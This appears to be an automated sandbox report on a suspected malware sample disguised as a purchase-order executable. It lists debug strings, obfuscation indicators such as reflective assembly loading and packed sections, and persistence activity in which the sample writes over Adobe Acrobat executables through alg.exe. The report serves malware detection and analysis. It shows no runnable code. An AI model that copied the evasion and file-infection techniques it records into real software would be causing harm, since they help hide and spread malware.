                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic file information: File size 1442304 > 1048576
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x15cc00
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000000B.00000003.2296140899.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: GoogleUpdateCore_unsigned.pdb source: GoogleUpdateCore.exe.11.dr
                          Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000B.00000003.2355912199.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2354806211.0000000000790000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2390611024.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 0000000B.00000003.1895950529.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000000B.00000003.2117234182.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000000B.00000003.2117234182.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000000B.00000003.2141944111.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000B.00000003.2472348411.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2468389247.00000000007D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdbOGP source: setup.exe0.11.dr
                          Source: Binary string: _.pdb source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2045260394.0000000004723000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: crashreporter.pdb source: alg.exe, 0000000B.00000003.2627135802.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000000B.00000003.2057910358.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.11.dr
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 0000000B.00000003.2278455049.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.11.dr
                          Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000B.00000003.2437741303.0000000000470000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000B.00000003.2303409881.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2310976010.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 0000000B.00000003.2349211706.00000000007A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000000B.00000003.2171393747.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 0000000B.00000003.1901299127.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: uws\dll\mscorlib.pdbe source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe.pdb source: Aut2exe.exe.11.dr
                          Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000000B.00000003.2141944111.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 0000000B.00000003.1921288633.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, AcroBroker.exe.11.dr
                          Source: Binary string: Acrobat_SL.pdb source: alg.exe, 0000000B.00000003.1901299127.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000B.00000003.2355912199.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2354806211.0000000000790000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2390611024.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 0000000B.00000003.2349211706.00000000007A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000000B.00000003.2057910358.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 0000000B.00000003.2189745074.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, CRWindowsClientService.exe.11.dr
                          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: alg.exe, 0000000B.00000003.1814990672.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 0000000B.00000003.1895950529.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: mavinject32.pdb source: alg.exe, 0000000B.00000003.2472348411.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2468389247.00000000007D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000000B.00000003.1836586414.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 0000000B.00000003.2262552254.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, 64BitMAPIBroker.exe.11.dr
                          Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdb source: setup.exe0.11.dr
                          Source: Binary string: GoogleUpdateCore_unsigned.pdbV source: GoogleUpdateCore.exe.11.dr
                          Source: Binary string: firefox.pdb source: alg.exe, 0000000B.00000003.2654415779.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000B.00000003.2437741303.0000000000470000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000000B.00000003.2241398314.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: firefox.pdbP source: alg.exe, 0000000B.00000003.2654415779.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000000B.00000003.2171393747.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 0000000B.00000003.2189745074.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, CRWindowsClientService.exe.11.dr
                          Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 0000000B.00000003.2246072048.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000000B.00000003.2296140899.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 0000000B.00000003.2278455049.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.11.dr
                          Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000000B.00000003.1836586414.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000B.00000003.2303409881.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2310976010.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 0000000B.00000003.2203720217.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.11.dr
                          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_proxy.exe.pdb source: chrome_proxy.exe.11.dr
                          Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.11.dr
                          Source: Binary string: mscorlib.pdb source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005EBC000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.11.dr
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 0000000B.00000003.1921288633.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, AcroBroker.exe.11.dr
                          Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.11.dr
                          Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000000B.00000003.2425011073.0000000000440000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 0000000B.00000003.2246072048.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 0000000B.00000003.2203720217.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.11.dr
                          Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000000B.00000003.2425011073.0000000000440000.00000004.00001000.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.75f0000.3.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                          Source: alg.exe.8.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                          Source: armsvc.exe.8.drStatic PE information: section name: .didat
                          Source: alg.exe.8.drStatic PE information: section name: .didat
                          Source: FXSSVC.exe.8.drStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 0_2_015C72DA pushfd ; ret 0_2_015C72DD
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0041C40C push cs; iretd 8_2_0041C4E2
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00423149 push eax; ret 8_2_00423179
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0041C50E push cs; iretd 8_2_0041C4E2
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004231C8 push eax; ret 8_2_00423179
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0040E21D push ecx; ret 8_2_0040E230
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0041C6BE push ebx; ret 8_2_0041C6BF
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0040BB97 push dword ptr [ecx-75h]; iretd 8_2_0040BBA3
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD520C push 02BD528Fh; ret 8_2_02BD522D
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD4B70 push 02BD4C73h; ret 8_2_02BD4B9C
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD4B70 push 02BD4E86h; ret 8_2_02BD4C24
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD4B70 push 02BD4E27h; ret 8_2_02BD4EC9
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDB180 push 02BDB0CAh; ret 8_2_02BDB061
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDB180 push 02BDB30Dh; ret 8_2_02BDB1E6
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDB180 push 02BDB2F2h; ret 8_2_02BDB262
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDB180 push 02BDB255h; ret 8_2_02BDB2ED
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDB180 push 02BDB2D0h; ret 8_2_02BDB346
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDB180 push 02BDB37Fh; ret 8_2_02BDB3B7
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDCD65h; ret 8_2_02BDCC98
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDCD58h; ret 8_2_02BDCCD8
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDCE1Ch; ret 8_2_02BDCE1B
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDCFECh; ret 8_2_02BDCEB2
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD2B5h; ret 8_2_02BDCF7B
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD4CEh; ret 8_2_02BDCFB6
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD46Ch; ret 8_2_02BDCFD6
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD6E7h; ret 8_2_02BDD0AB
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD7C6h; ret 8_2_02BDD15E
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD003h; ret 8_2_02BDD1DD
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD19Fh; ret 8_2_02BDD27C
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD307h; ret 8_2_02BDD2E6
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BDCE90 push 02BDD1C8h; ret 8_2_02BDD441
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: section name: .text entropy: 7.982441629282343
                          Source: zeXKjViL.exe.0.drStatic PE information: section name: .text entropy: 7.982441629282343
                          Source: AppVClient.exe.8.drStatic PE information: section name: .reloc entropy: 7.936507952897012
                          Source: FXSSVC.exe.8.drStatic PE information: section name: .reloc entropy: 7.942257807197702

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a5f0bea56967b89b.bin
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
